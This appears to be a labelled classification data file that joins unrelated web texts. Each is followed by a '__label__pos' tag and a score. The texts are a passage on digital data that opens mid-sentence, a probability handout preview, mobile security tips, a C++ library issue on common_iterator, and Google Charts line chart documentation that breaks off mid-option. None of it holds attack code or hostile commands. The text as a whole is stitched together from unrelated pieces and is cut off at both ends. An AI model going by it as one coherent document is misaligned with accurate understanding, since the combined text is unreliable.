so that the CPU can read it. For devices with only a few switches (such as the buttons on a joystick), the status of each can be encoded as bits (usually 0 for released and 1 for pressed) in a single word. This is useful when combinations of key presses are meaningful, and is sometimes used for passing the status of modifier keys on a keyboard (such as shift and control). But it does not scale to support more keys than the number of bits in a single byte or word. Devices with many switches (such as a computer keyboard) usually arrange these switches in a scan matrix, with the individual switches on the intersections of x and y lines. When a switch is pressed, it connects the corresponding x and y lines together. Polling (often called scanning in this case) is done by activating each x line in sequence and detecting which y lines then have a signal, thus which keys are pressed. When the keyboard processor detects that a key has changed state, it sends a signal to the CPU indicating the scan code of the key and its new state. The symbol is then encoded, or converted into a number, based on the status of modifier keys and the desired character encoding. A custom encoding can be used for a specific application with no loss of data. However, using a standard encoding such as ASCII is problematic if a symbol such as 'ß' needs to be converted but is not in the standard. It is estimated that in the year 1986 less than 1% of the world's technological capacity to store information was digital and in 2007 it was already 94%.[2] The year 2002 is assumed to be the year when human kind was able to store more information in digital than in analog format (the "beginning of the digital age").[3] Properties of digital information[edit] All digital information possesses common properties that distinguish it from analog communications methods: • Synchronization: Since digital information is conveyed by the sequence in which symbols are ordered, all digital schemes have some method for determining the beginning of a sequence. In written or spoken human languages synchronization is typically provided by pauses (spaces), capitalization, and punctuation. Machine communications typically use special synchronization sequences. • Language: All digital communications require a language, which in this context consists of all the information that the sender and receiver of the digital communication must both possess, in advance, in order for the communication to be successful. Languages are generally arbitrary and specify the meaning to be assigned to particular symbol sequences, the allowed range of values, methods to be used for synchronization, etc. • Errors: Disturbances (noise) in analog communications invariably introduce some, generally small deviation or error between the intended and actual communication. Disturbances in a digital communication do not result in errors unless the disturbance is so large as to result in a symbol being misinterpreted as another symbol or disturb the sequence of symbols. It is therefore generally possible to have an entirely error-free digital communication. Further, techniques such as check codes may be used to detect errors and guarantee error-free communications through redundancy or retransmission. Errors in digital communications can take the form of substitution errors in which a symbol is replaced by another symbol, or insertion/deletion errors in which an extra incorrect symbol is inserted into or deleted from a digital message. Uncorrected errors in digital communications have unpredictable and generally large impact on the information content of the communication. • Copying: Because of the inevitable presence of noise, making many successive copies of an analog communication is infeasible because each generation increases the noise. Because digital communications are generally error-free, copies of copies can be made indefinitely. • Granularity: The digital representation of a continuously variable analog value typically involves a selection of the number of symbols to be assigned to that value. The number of symbols determines the precision or resolution of the resulting datum. The difference between the actual analog value and the digital representation is known as quantization error. For example, if the actual temperature is 23.234456544453 degrees, but if only two digits (23) are assigned to this parameter in a particular digital representation, the quantizing error is: 0.234456544453. This property of digital communication is known as granularity. • Compressible: According to Miller, "Uncompressed digital data is very large, and in its raw form would actually produce a larger signal (therefore be more difficult to transfer) than analog data. However, digital data can be compressed. Compression reduces the amount of bandwidth space needed to send information. Data can be compressed, sent and then decompressed at the site of consumption. This makes it possible to send much more information and result in, for example, digital television signals offering more room on the airwave spectrum for more television channels."[4] Historical digital systems[edit] Even though digital signals are generally associated with the binary electronic digital systems used in modern electronics and computing, digital systems are actually ancient, and need not be binary or electronic.[citation needed] • Written text (due to the limited character set and the use of discrete symbols - the alphabet in most cases) • The abacus was created sometime between 1000 BC and 500 BC, it later became a form of calculation frequency. Nowadays it can be used as a very advanced, yet basic digital calculator that uses beads on rows to represent numbers. Beads only have meaning in discrete up and down states, not in analog in-between states. • A beacon is perhaps the simplest non-electronic digital signal, with just two states (on and off). In particular, smoke signals are one of the oldest examples of a digital signal, where an analog "carrier" (smoke) is modulated with a blanket to generate a digital signal (puffs) that conveys information. • Morse code uses six digital states—dot, dash, intra-character gap (between each dot or dash), short gap (between each letter), medium gap (between words), and long gap (between sentences)—to send messages via a variety of potential carriers such as electricity or light, for example using an electrical telegraph or a flashing light. • The Braille system was the first binary format for character encoding, using a six-bit code rendered as dot patterns. • Flag semaphore uses rods or flags held in particular positions to send messages to the receiver watching them some distance away. • International maritime signal flags have distinctive markings that represent letters of the alphabet to allow ships to send messages to each other. • More recently invented, a modem modulates an analog "carrier" signal (such as sound) to encode binary electrical digital information, as a series of binary digital sound pulses. A slightly earlier, surprisingly reliable version of the same concept was to bundle a sequence of audio digital "signal" and "no signal" information (i.e. "sound" and "silence") on magnetic cassette tape for use with early home computers. See also[edit] References[edit] 1. ^ Ceruzzi, Paul E. (2012-06-29). Computing (MIT Press Essential Knowledge). MIT Press. 2. ^ "The World’s Technological Capacity to Store, Communicate, and Compute Information", especially Supporting online material, Martin Hilbert and Priscila López (2011), Science (journal), 332(6025), 60-65; free access to the article through here: martinhilbert.net/WorldInfoCapacity.html 3. ^ "video animation on The World’s Technological Capacity to Store, Communicate, and Compute Information from 1986 to 2010 4. ^ Miller, Vincent (2011) Understanding digital culture. "Convergence and the contemporary media experience". London: Sage Publications. Further reading[edit] • Tocci, R. 2006. Digital Systems: Principles and Applications (10th Edition). Prentice Hall. ISBN 0-13-172579-3
__label__pos
0.993518
Handout_4 Introduction to probability Handout_4 Introduction to probability - Feb 909... Info iconThis preview shows pages 1–2. Sign up to view the full content. View Full Document Right Arrow Icon Feb 9’09 INTRODUCTION TO PROBABILITY #4 The theory of probability provides the foundation for statistical inference . BASIC TERMS . In probability, an experiment is an activity or occurrence with an observable result. Each repetition of an experiment is called a trial . The possible results of each trial are called outcomes or events . The set of all possible outcomes for an experiment is called the sample space for that experiment. For example, a sample space S for the experiment of tossing a coin is made up of two possible outcomes: heads ( h ) and tails ( t ) . In the set notations, we may write S = {h, t} An event is a subset of a sample space . Events are designated with capital letters: A, B, …, E, … which may have subscripts. Thus, in the experiment of tossing a coin, one of two mutually exclusive events may occur: the event A = {h} , which represents the outcome “heads” and the event B = {t} , which represents the outcome “tails”. ( The events are said to be mutually exclusive if no two of them can occur together ). Different types of events may be associated with the same experiment, and an experiment may have more than one sample space associated with it . Example : for the experiment of rolling a single fair six-sided die, if we consider the events like showing a single number on the top face, then we may introduce a sample space (of size 6) S = {1, 2, 3, 4, 5, 6} which includes six possible mutually exclusive outcomes. But we may associate with this experiment also some other events: a) the die shows an odd number : there are three possible events of this type: E 1a = {1}, E 2a = {3}, E 3a = {5}, and the corresponding sample space (of size 3) is S a = {1, 3, 5}; b) the die shows a number greater than 2 : there are four possible events of such a type: E 1b = {3}, E 2b = {4}, E 3b = {5}, E 4b = {6}, and the corresponding sample space (of size 4) is S b = {3, 4, 5, 6}; c) the die shows a multiple of 3 : there are two possible events of this type: E 1c = {3} and E 2c = {6}, and the sample space (of size 2) is S c = {3, 6}. A probability of an event Background image of page 1 Info iconThis preview has intentionally blurred sections. Sign up to view the full version. View Full DocumentRight Arrow Icon Image of page 2 This is the end of the preview. Sign up to access the rest of the document. Page1 / 3 Handout_4 Introduction to probability - Feb 909... This preview shows document pages 1 - 2. Sign up to view the full document. View Full Document Right Arrow Icon Ask a homework question - tutors are online
__label__pos
0.996293
Navigating Mobile Security: Protecting Your Device in an Evolving Threat Landscape – JBL Tone Mobile Navigating Mobile Security: Protecting Your Device in an Evolving Threat Landscape In an era where smartphones have become an integral part of our daily lives, ensuring the security of these devices is paramount. As technology advances, so do the threats to mobile security, ranging from malware and phishing attacks to data breaches and identity theft. Navigating the complex landscape of mobile security requires vigilance, awareness, and proactive measures to safeguard your device and personal information. Let’s explore how you can protect your device in an evolving threat landscape. 1. Keep Your Software Updated One of the most effective ways to protect your device is to keep its software updated regularly. Operating system updates and security patches often contain fixes for vulnerabilities that could be exploited by cybercriminals. Enable automatic updates on your device to ensure that you receive the latest security enhancements promptly. 2. Use Strong Authentication Methods Protect your device with strong authentication methods such as biometric authentication (e.g., fingerprint or face recognition) or secure PIN codes. These additional layers of security make it harder for unauthorized users to access your device and personal data, even if your device is lost or stolen. 3. Be Wary of App Permissions Before installing any app on your device, carefully review the permissions it requests. Avoid granting unnecessary permissions that could potentially compromise your privacy and security. Be particularly cautious of apps that request access to sensitive information or device features without a valid reason. 4. Install Antivirus and Security Software Consider installing reputable antivirus and security software on your device to detect and remove malware, phishing attempts, and other threats. These security solutions offer features such as real-time scanning, malicious website blocking, and remote device locking or wiping in case of theft or loss. 5. Secure Your Network Connections When connecting to Wi-Fi networks, prioritize secure connections over public or unsecured networks. Avoid transmitting sensitive information over unencrypted connections, and use virtual private network (VPN) services when accessing public Wi-Fi networks to encrypt your data and protect your privacy. 6. Enable Remote Tracking and Wiping Take advantage of built-in features such as “Find My Device” (Android) or “Find My iPhone” (iOS) to remotely track, lock, or erase your device in case it is lost or stolen. These features provide peace of mind and can help prevent unauthorized access to your personal information. 7. Exercise Caution with Links and Downloads Be cautious when clicking on links or downloading files from unknown or suspicious sources, as they may contain malware or phishing attempts. Verify the authenticity of websites and sources before providing any personal information or downloading content to your device. 8. Backup Your Data Regularly Regularly back up your device data to a secure cloud storage service or external storage device. In the event of a security incident or device failure, having backups ensures that you can restore your data and minimize potential loss or damage. 9. Educate Yourself About Security Best Practices Stay informed about the latest security threats and best practices for mobile device security. Educate yourself about common attack vectors, phishing scams, and security vulnerabilities to mitigate risks effectively. By staying vigilant and proactive, you can better protect your device and personal information in an evolving threat landscape. In conclusion, navigating mobile security requires a proactive approach and a combination of preventive measures, awareness, and caution. By following these tips and implementing security best practices, you can safeguard your device and personal information from the ever-present threats in today’s digital world. Remember, staying informed and vigilant is key to protecting your mobile device in an evolving threat landscape. Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.873052
This page is a snapshot from the LWG issues list, see the Library Active Issues List for more information and the meaning of WP status. 3546. common_iterator's postfix-proxy is not quite right Section: 25.5.5.5 [common.iter.nav] Status: WP Submitter: Tim Song Opened: 2021-04-23 Last modified: 2021-06-12 Priority: Not Prioritized View all other issues in [common.iter.nav]. View all issues with WP status. Discussion: P2259R1 modeled common_iterator::operator++(int)'s postfix-proxy class on the existing proxy class used by common_iterator::operator->, but in doing so it overlooked two differences: The proposed wording has been implemented and tested. [2021-05-10; Reflector poll] Set status to Tentatively Ready after five votes in favour during reflector poll. [2021-05-17; Reflector poll] Set status to Tentatively Ready after five votes in favour during reflector poll. [2021-06-07 Approved at June 2021 virtual plenary. Status changed: Voting → WP.] Proposed resolution: This wording is relative to N4885. 1. Modify 25.5.5.5 [common.iter.nav] as indicated: decltype(auto) operator++(int); -4- Preconditions: holds_alternative<I>(v_) is true. -5- Effects: If I models forward_iterator, equivalent to: common_iterator tmp = *this; ++*this; return tmp; Otherwise, if requires (I& i) { { *i++ } -> can-reference; } is true or constructible_from<iter_value_t<I>, iter_reference_t<I>> && move_constructible<iter_value_t<I>> is false, equivalent to: return get<I>(v_)++; Otherwise, equivalent to: postfix-proxy p(**this); ++*this; return p; where postfix-proxy is the exposition-only class: class postfix-proxy { iter_value_t<I> keep_; postfix-proxy(iter_reference_t<I>&& x) : keep_(std::moveforward<iter_reference_t<I>>(x)) {} public: const iter_value_t<I>& operator*() const { return keep_; } };
__label__pos
0.768878
World Cancer Day: I can make healthy lifestyle choices 0 489 World Cancer Day Taking place under the tagline ‘We can. I can.’, World Cancer Day 2016-2018 will explore how everyone – as a collective or as individuals – can do their part to reduce the global burden of cancer. Diagnosing cancer isn’t always easy – not all cancers show early signs and symptoms and other warning signs appear quite late when the cancer is advanced.World cancer day Everyone can take steps to reduce their risk of cancer by choosing healthy options including quitting smoking, keeping physically active and choosing healthy food and drinks. ALSO READ: War against all forms of cancer may soon be won – Research Tobacco use is the single largest preventable cause of cancer globally. Quitting smoking will have a major positive impact on an individual’s health and that of their families and friends. The good news is that quitting at any age is beneficial, increasing life expectancy and improving quality of life. Individuals can also reduce their risk of many common cancers by maintaining a healthy weight, and making physical activity part of their everyday lives,. Being overweight or obese increases the risk of ten cancers – bowel, breast, uterine, ovarian, pancreatic, oesophagus, kidney, liver, advanced prostate and gallbladder cancers. SEE: Breast cancer: its causes, symptoms, and treatment. Specific changes to a person’s diet can also make a difference – for example, individuals can limit their intake of red meat and avoid processed meat. Alcohol is also strongly linked with an increased risk of several cancers. Reducing alcohol consumption decreases the risk of cancers of the mouth, pharynx, larynx, oesophagus, bowel, liver and breast. LISTEN: Cervical Cancer : What You Should Know Overall, more than a third of common cancers could be prevented by a healthy diet, being physically active and maintaining a healthy body weight. Reducing exposure to ultraviolet (UV) radiation from the sun and other sources, such as solariums, is also important to reduce the risk of many skin cancers Facebook Comments Disclaimer: Pinnaclehealthradio.org does not guarantee any specific results as a result of the procedures mentioned here and the results may vary from person to person. The topics in these pages including text, graphics, videos and other material contained on this website are for informational purposes only and not to be substituted for professional medical advice. Leave a Reply
__label__pos
0.574763
At a glance Also known as ZPP; ZP; Free erythrocyte protoporphyrin; FEP Why get tested? To screen for and monitor chronic exposure to lead; to detect iron deficiency in children When to get tested? When you have been chronically exposed to lead, as part of a programme to monitor lead exposure, and/or when your doctor suspects lead poisoning; as part of a screening programme for iron deficiency in children and adolescents Sample required? A blood sample drawn from a vein in your arm or from a fingerstick   What is being tested? The zinc protoporphyrin (ZPP) test is a blood test that can identify a disruption in the formation of haem. Haem is an essential component of haemoglobin, the protein in red blood cells (RBC) that carries oxygen from the lungs to the body's tissues and cells. The formation of haem occurs in a series of enzymatic steps that conclude with the insertion of an iron atom into the centre of a molecule called protoporphyrin. Lead also inhibits haem synthesis and therefore can cause an increase in RBC ZPP. If there is not enough iron available, then protoporphyrin combines with zinc instead of iron to form zinc protoporphyrin. Since it cannot transport oxygen, ZPP serves no useful purpose in the RBC that contain it. ZPP is usually measured relative to the amount of haemoglobin.The ZPP/haem ratio gives the proportion of ZPP compared to haem in red blood cells. ZPP itself is measured in two ways. Some methods measures total erthyrocyte protoporphyrin, which includes both ZPP, (more than 90% of protoporphyrin in red blood cells), and free protoporphyrin (FEP), which is not bound to zinc. As ZPP usually makes up most of the total erthyrocyte protoporphyrin, the ability to discriminate between ZPP and FEP is not considered significant. Other methods are able to discriminate between ZPP and FEP measure only ZPP. How is the sample collected for testing? To measure ZPP, a blood sample is taken by inserting a needle into a vein in your arm. To determine the ZPP/haem ratio, a drop of blood from a fingerstick is placed in an instrument called a haematofluorometer. This instrument measures the fluorescence of ZPP and reports the amount of ZPP per number of haem molecules. Since only a single drop of blood is required, this test is well suited for screening children. Is any test preparation needed to ensure the quality of the sample? No test preparation is needed.   The Test How is it used? Zinc protoporphyrin is primarily ordered to detect and monitor chronic exposure to lead in adults. In screening programmes it can be used to detect iron deficiency in children. ZPP may be ordered, along with a lead level, to test for chronic lead exposure. Hobbyists who work with products containing lead and people who live in older houses may be at an increased risk of developing lead poisoning. This is because lead is usually ingested or inhaled. Those who inhale dust that contains lead, handle lead directly and then eat, or in the case of children, eat paint chips that contain lead (common in houses built prior to 1960) can have elevated levels of lead and ZPP in their body. ZPP is not sensitive enough for use as a screening test in children, as values do not rise until lead concentrations exceed the acceptable range. The maximum lead concentrations considered safe in children have been set at a very low level by the Centers for Disease Control and Prevention (CDC) in the USA and the National Health and Medical Research Council (NHMRC) in Australia to minimise the negative impact of lead exposure on their development. In this age group, blood lead measurements should be done to detect exposure to lead. In children, the ZPP/haem ratio is sometimes ordered as an early indicator of iron deficiency. An increase in the ZPP/haem ratio is one of the first signs of insufficient iron stores and will be elevated in most young people before signs or symptoms of anaemia are present. More specific tests of iron status are required to confirm iron deficiency. When is it requested? ZPP is ordered along with lead for adults when chronic exposure to lead is suspected, when an employee is a participant in an occupational lead monitoring programme, or when someone has a hobby, such as stained glass working, that brings them into frequent contact with lead. The ZPP/haem ratio is ordered as a screening test for iron deficiency in children and adolescents and/or when iron deficiency is suspected. What does the test result mean? The ZPP concentration in blood is usually very low. An increase in ZPP indicates a disruption of normal haem production but is not specific as to its cause. The main reasons for increases in ZPP are iron deficiency and lead poisoning. It is important that ZPP levels be evaluated in the context of a patient's history, clinical findings, and the results of other tests such as ferritin, lead, and a full blood count (FBC). It is possible that the patient may have both iron deficiency and lead poisoning. In cases of chronic lead exposure, ZPP reflects the average lead level over the previous 3-4 months. However, the amount of lead currently present in the blood and the burden of lead in the body (the amount in the organs and bones) cannot be determined with a ZPP test. Values for ZPP rise more slowly than blood lead concentration following exposure, and they take longer to drop after exposure to lead has ceased. ZPP remains useful for ongoing monitoring of individuals on treatment with confirmed elevated lead levels. An increase in the ZPP/haem ratio in a child is most often due to iron deficiency. A decreasing ZPP/haem ratio over time following iron supplementation likely indicates an increase in iron availability. Is there anything else I should know? An increased ZPP level is also seen in erythropoietic porphyrias, but these hereditary diseases are much less common than iron deficiency or lead poisoning. ZPP may be elevated in inflammatory conditions, anaemia of chronic disease, infections, and several blood-related diseases, but it is not generally used to monitor or diagnose these conditions. Depending on the method used to test ZPP, other substances in the blood that fluoresce, such as bilirubin and riboflavin, can produce false positive results. Falsely low values may occur if the sample is not protected from light before testing. Common Questions Besides ZPP and lead levels, what other tests might my physician order to monitor exposure to lead? If you are in an occupational setting where you are frequently exposed to lead, your physician may order the following tests to evaluate your kidneys and red blood cell production: Last Review Date: March 21, 2021 Was this page helpful?
__label__pos
0.999071
Line Chart Overview A line chart that is rendered within the browser using SVG or VML. Displays tooltips when hovering over points. Examples Curving the Lines You can smooth the lines by setting the curveType option to function: The code to generate this chart is below. Note the use of the curveType: function option: <html> <head> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script> <script type="text/javascript"> google.charts.load('current', {'packages':['corechart']}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['Year', 'Sales', 'Expenses'], ['2004', 1000, 400], ['2005', 1170, 460], ['2006', 660, 1120], ['2007', 1030, 540] ]); var options = { title: 'Company Performance', curveType: 'function', legend: { position: 'bottom' } }; var chart = new google.visualization.LineChart(document.getElementById('curve_chart')); chart.draw(data, options); } </script> </head> <body> <div id="curve_chart" style="width: 900px; height: 500px"></div> </body> </html> Creating Material Line Charts In 2014, Google announced guidelines intended to support a common look and feel across its properties and apps (such as Android apps) that run on Google platforms. We call this effort Material Design. We'll be providing "Material" versions of all our core charts; you're welcome to use them if you like how they look. Creating a Material Line Chart is similar to creating what we'll now call a "Classic" Line Chart. You load the Google Visualization API (although with the 'line' package instead of the 'corechart' package), define your datatable, and then create an object (but of class google.charts.Line instead of google.visualization.LineChart). Note: Material Charts will not work in old versions of Internet Explorer. (IE8 and earlier versions don't support SVG, which Material Charts require.) Material Line Charts have many small improvements over Classic Line Charts, including an improved color palette, rounded corners, clearer label formatting, tighter default spacing between series, softer gridlines, and titles (and the addition of subtitles). google.charts.load('current', {'packages':['line']}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = new google.visualization.DataTable(); data.addColumn('number', 'Day'); data.addColumn('number', 'Guardians of the Galaxy'); data.addColumn('number', 'The Avengers'); data.addColumn('number', 'Transformers: Age of Extinction'); data.addRows([ [1, 37.8, 80.8, 41.8], [2, 30.9, 69.5, 32.4], [3, 25.4, 57, 25.7], [4, 11.7, 18.8, 10.5], [5, 11.9, 17.6, 10.4], [6, 8.8, 13.6, 7.7], [7, 7.6, 12.3, 9.6], [8, 12.3, 29.2, 10.6], [9, 16.9, 42.9, 14.8], [10, 12.8, 30.9, 11.6], [11, 5.3, 7.9, 4.7], [12, 6.6, 8.4, 5.2], [13, 4.8, 6.3, 3.6], [14, 4.2, 6.2, 3.4] ]); var options = { chart: { title: 'Box Office Earnings in First Two Weeks of Opening', subtitle: 'in millions of dollars (USD)' }, width: 900, height: 500 }; var chart = new google.charts.Line(document.getElementById('linechart_material')); chart.draw(data, google.charts.Line.convertOptions(options)); } The Material Charts are in beta. The appearance and interactivity are largely final, but many of the options available in Classic Charts are not yet available in them. You can find a list of options that are not yet supported in this issue. Also, the way options are declared is not finalized, so if you are using any of the classic options, you must convert them to material options by replacing this line: chart.draw(data, options); ...with this: chart.draw(data, google.charts.Line.convertOptions(options)); Dual-Y Charts Sometimes you'll want to display two series in a line chart, with two independent y-axes: a left axis for one series, and a right axis for another: Note that not only are our two y-axes labeled differently ("Temps" versus "Daylight") but they each have their own independent scales and gridlines. If you want to customize this behavior, use the vAxis.gridlines and vAxis.viewWindow options. In the Material code below, the axes and series options together specify the dual-Y appearance of the chart. The series option specifies which axis to use for each ('Temps' and 'Daylight'; they needn't have any relation to the column names in the datatable). The axes option then makes this chart a dual-Y chart, placing the 'Temps' axis on the left and the 'Daylight' axis on the right. In the Classic code, this differs slightly. Rather than the axes option, you will use the vAxes option (or hAxes on horizontally oriented charts). Also, instead of using names, you will use the index numbers to coordinate a series with an axis using the targetAxisIndex option. Material var materialOptions = { chart: { title: 'Average Temperatures and Daylight in Iceland Throughout the Year' }, width: 900, height: 500, series: { // Gives each series an axis name that matches the Y-axis below. 0: {axis: 'Temps'}, 1: {axis: 'Daylight'} }, axes: { // Adds labels to each axis; they don't have to match the axis names. y: { Temps: {label: 'Temps (Celsius)'}, Daylight: {label: 'Daylight'} } } }; Classic var classicOptions = { title: 'Average Temperatures and Daylight in Iceland Throughout the Year', width: 900, height: 500, // Gives each series an axis that matches the vAxes number below. series: { 0: {targetAxisIndex: 0}, 1: {targetAxisIndex: 1} }, vAxes: { // Adds titles to each axis. 0: {title: 'Temps (Celsius)'}, 1: {title: 'Daylight'} }, hAxis: { ticks: [new Date(2014, 0), new Date(2014, 1), new Date(2014, 2), new Date(2014, 3), new Date(2014, 4), new Date(2014, 5), new Date(2014, 6), new Date(2014, 7), new Date(2014, 8), new Date(2014, 9), new Date(2014, 10), new Date(2014, 11) ] }, vAxis: { viewWindow: { max: 30 } } }; Top-X Charts Note: Top-X axes are available only for Material charts (i.e., those with package line). If you want to put the X-axis labels and title on the top of your chart rather than the bottom, you can do that in Material charts with the axes.x option: <html> <head> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script> <script type="text/javascript"> google.charts.load('current', {'packages':['line']}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = new google.visualization.DataTable(); data.addColumn('number', 'Day'); data.addColumn('number', 'Guardians of the Galaxy'); data.addColumn('number', 'The Avengers'); data.addColumn('number', 'Transformers: Age of Extinction'); data.addRows([ [1, 37.8, 80.8, 41.8], [2, 30.9, 69.5, 32.4], [3, 25.4, 57, 25.7], [4, 11.7, 18.8, 10.5], [5, 11.9, 17.6, 10.4], [6, 8.8, 13.6, 7.7], [7, 7.6, 12.3, 9.6], [8, 12.3, 29.2, 10.6], [9, 16.9, 42.9, 14.8], [10, 12.8, 30.9, 11.6], [11, 5.3, 7.9, 4.7], [12, 6.6, 8.4, 5.2], [13, 4.8, 6.3, 3.6], [14, 4.2, 6.2, 3.4] ]); var options = { chart: { title: 'Box Office Earnings in First Two Weeks of Opening', subtitle: 'in millions of dollars (USD)' }, width: 900, height: 500, axes: { x: { 0: {side: 'top'} } } }; var chart = new google.charts.Line(document.getElementById('line_top_x')); chart.draw(data, google.charts.Line.convertOptions(options)); } </script> </head> <body> <div id="line_top_x"></div> </body> </html> Loading The google.charts.load package name is "corechart", and the visualization's class name is google.visualization.LineChart. google.charts.load("current", {packages: ["corechart"]}); var visualization = new google.visualization.LineChart(container); For Material Line Charts, the google.charts.load package name is "line", and the visualization's class name is google.charts.Line. google.charts.load("current", {packages: ["line"]}); var visualization = new google.charts.Line(container); Data Format Rows: Each row in the table represents a set of data points with the same x-axis location. Columns:   Column 0 Column 1 ... Column N Purpose: Line 1 values ... Line N values Data Type: number ... number Role: domain data ... data Optional column roles: ...   Configuration Options Name aggregationTarget How multiple data selections are rolled up into tooltips: • 'category': Group selected data by x-value. • 'series': Group selected data by series. • 'auto': Group selected data by x-value if all selections have the same x-value, and by series otherwise. • 'none': Show only one tooltip per selection. aggregationTarget will often be used in tandem with selectionMode and tooltip.trigger, e.g.: var options = { // Allow multiple // simultaneous selections. selectionMode: 'multiple', // Trigger tooltips // on selections. tooltip: {trigger: 'selection'}, // Group selections // by x-value. aggregationTarget: 'category', }; Type: string Default: 'auto' animation.duration The duration of the animation, in milliseconds. For details, see the animation documentation. Type: number Default: 0 animation.startup Determines if the chart will animate on the initial draw. If true, the chart will start at the baseline and animate to its final state. Type: boolean Default false animation.easing The easing function applied to the animation. The following options are available: • 'linear' - Constant speed. • 'in' - Ease in - Start slow and speed up. • 'out' - Ease out - Start fast and slow down. • 'inAndOut' - Ease in and out - Start slow, speed up, then slow down. Type: string Default: 'linear' annotations.boxStyle For charts that support annotations, the annotations.boxStyle object controls the appearance of the boxes surrounding annotations: var options = { annotations: { boxStyle: { // Color of the box outline. stroke: '#888', // Thickness of the box outline. strokeWidth: 1, // x-radius of the corner curvature. rx: 10, // y-radius of the corner curvature. ry: 10, // Attributes for linear gradient fill. gradient: { // Start color for gradient. color1: '#fbf6a7', // Finish color for gradient. color2: '#33b679', // Where on the boundary to start and // end the color1/color2 gradient, // relative to the upper left corner // of the boundary. x1: '0%', y1: '0%', x2: '100%', y2: '100%', // If true, the boundary for x1, // y1, x2, and y2 is the box. If // false, it's the entire chart. useObjectBoundingBoxUnits: true } } } }; This option is currently supported for area, bar, column, combo, line, and scatter charts. It is not supported by the Annotation Chart. Type: object Default: null annotations.datum For charts that support annotations, the annotations.datum object lets you override Google Charts' choice for annotations provided for individual data elements (such as values displayed with each bar on a bar chart). You can control the color with annotations.datum.stem.color, the stem length with annotations.datum.stem.length, and the style with annotations.datum.style. Type: object Default: color is "black"; length is 12; style is "point". annotations.domain For charts that support annotations, the annotations.domain object lets you override Google Charts' choice for annotations provided for a domain (the major axis of the chart, such as the X axis on a typical line chart). You can control the color with annotations.domain.stem.color, the stem length with annotations.domain.stem.length, and the style with annotations.domain.style. Type: object Default: color is "black"; length is 5; style is "point". annotations.highContrast For charts that support annotations, the annotations.highContrast boolean lets you override Google Charts' choice of the annotation color. By default, annotations.highContrast is true, which causes Charts to select an annotation color with good contrast: light colors on dark backgrounds, and dark on light. If you set annotations.highContrast to false and don't specify your own annotation color, Google Charts will use the default series color for the annotation: Type: boolean Default: true annotations.stem For charts that support annotations, the annotations.stem object lets you override Google Charts' choice for the stem style. You can control color with annotations.stem.color and the stem length with annotations.stem.length. Note that the stem length option has no effect on annotations with style 'line': for 'line' datum annotations, the stem length is always the same as the text, and for 'line' domain annotations, the stem extends across the entire chart. Type: object Default: color is "black"; length is 5 for domain annotations and 12 for datum annotations. annotations.style For charts that support annotations, the annotations.style option lets you override Google Charts' choice of the annotation type. It can be either 'line' or 'point'. Type: string Default: 'point' annotations.textStyle For charts that support annotations, the annotations.textStyle object controls the appearance of the text of the annotation: var options = { annotations: { textStyle: { fontName: 'Times-Roman', fontSize: 18, bold: true, italic: true, // The color of the text. color: '#871b47', // The color of the text outline. auraColor: '#d799ae', // The transparency of the text. opacity: 0.8 } } }; This option is currently supported for area, bar, column, combo, line, and scatter charts. It is not supported by the Annotation Chart . Type: object Default: null axisTitlesPosition Where to place the axis titles, compared to the chart area. Supported values: • in - Draw the axis titles inside the chart area. • out - Draw the axis titles outside the chart area. • none - Omit the axis titles. Type: string Default: 'out' backgroundColor The background color for the main area of the chart. Can be either a simple HTML color string, for example: 'red' or '#00cc00', or an object with the following properties. Type: string or object Default: 'white' backgroundColor.stroke The color of the chart border, as an HTML color string. Type: string Default: '#666' backgroundColor.strokeWidth The border width, in pixels. Type: number Default: 0 backgroundColor.fill The chart fill color, as an HTML color string. Type: string Default: 'white' chartArea An object with members to configure the placement and size of the chart area (where the chart itself is drawn, excluding axis and legends). Two formats are supported: a number, or a number followed by %. A simple number is a value in pixels; a number followed by % is a percentage. Example: chartArea:{left:20,top:0,width:'50%',height:'75%'} Type: object Default: null chartArea.backgroundColor Chart area background color. When a string is used, it can be either a hex string (e.g., '#fdc') or an English color name. When an object is used, the following properties can be provided: • stroke: the color, provided as a hex string or English color name. • strokeWidth: if provided, draws a border around the chart area of the given width (and with the color of stroke). Type: string or object Default: 'white' chartArea.left How far to draw the chart from the left border. Type: number or string Default: auto chartArea.top How far to draw the chart from the top border. Type: number or string Default: auto chartArea.width Chart area width. Type: number or string Default: auto chartArea.height Chart area height. Type: number or string Default: auto colors The colors to use for the chart elements. An array of strings, where each element is an HTML color string, for example: colors:['red','#004411']. Type: Array of strings Default: default colors crosshair An object containing the crosshair properties for the chart. Type: object Default: null crosshair.color The crosshair color, expressed as either a color name (e.g., "blue") or an RGB value (e.g., "#adf"). Type: string Type: default crosshair.focused An object containing the crosshair properties upon focus. Example: crosshair: { focused: { color: '#3bc', opacity: 0.8 } } Type: object Default: default crosshair.opacity The crosshair opacity, with 0.0 being fully transparent and 1.0 fully opaque. Type: number Default: 1.0 crosshair.orientation The crosshair orientation, which can be 'vertical' for vertical hairs only, 'horizontal' for horizontal hairs only, or 'both' for traditional crosshairs. Type: string Default: 'both' crosshair.selected An object containing the crosshair properties upon selection. Example: crosshair: { selected: { color: '#3bc', opacity: 0.8 } } Type: object Default: default crosshair.trigger When to display crosshairs: on 'focus', 'selection', or 'both'. Type: string Default: 'both' curveType Controls the curve of the lines when the line width is not zero. Can be one of the following: • 'none' - Straight lines without curve. • 'function' - The angles of the line will be smoothed. Type:string Default: 'none' dataOpacity The transparency of data points, with 1.0 being completely opaque and 0.0 fully transparent. In scatter, histogram, bar, and column charts, this refers to the visible data: dots in the scatter chart and rectangles in the others. In charts where selecting data creates a dot, such as the line and area charts, this refers to the circles that appear upon hover or selection. The combo chart exhibits both behaviors, and this option has no effect on other charts. (To change the opacity of a trendline, see trendline opacity .) Type: number Default: 1.0 enableInteractivity Whether the chart throws user-based events or reacts to user interaction. If false, the chart will not throw 'select' or other interaction-based events (but will throw ready or error events), and will not display hovertext or otherwise change depending on user input. Type: boolean Default: true explorer The explorer option allows users to pan and zoom Google charts. explorer: {} provides the default explorer behavior, enabling users to pan horizontally and vertically by dragging, and to zoom in and out by scrolling. This feature is experimental and may change in future releases. Note: The explorer only works with continuous axes (such as numbers or dates). Type: object Default: null explorer.actions The Google Charts explorer supports three actions: • dragToPan: Drag to pan around the chart horizontally and vertically. To pan only along the horizontal axis, use explorer: { 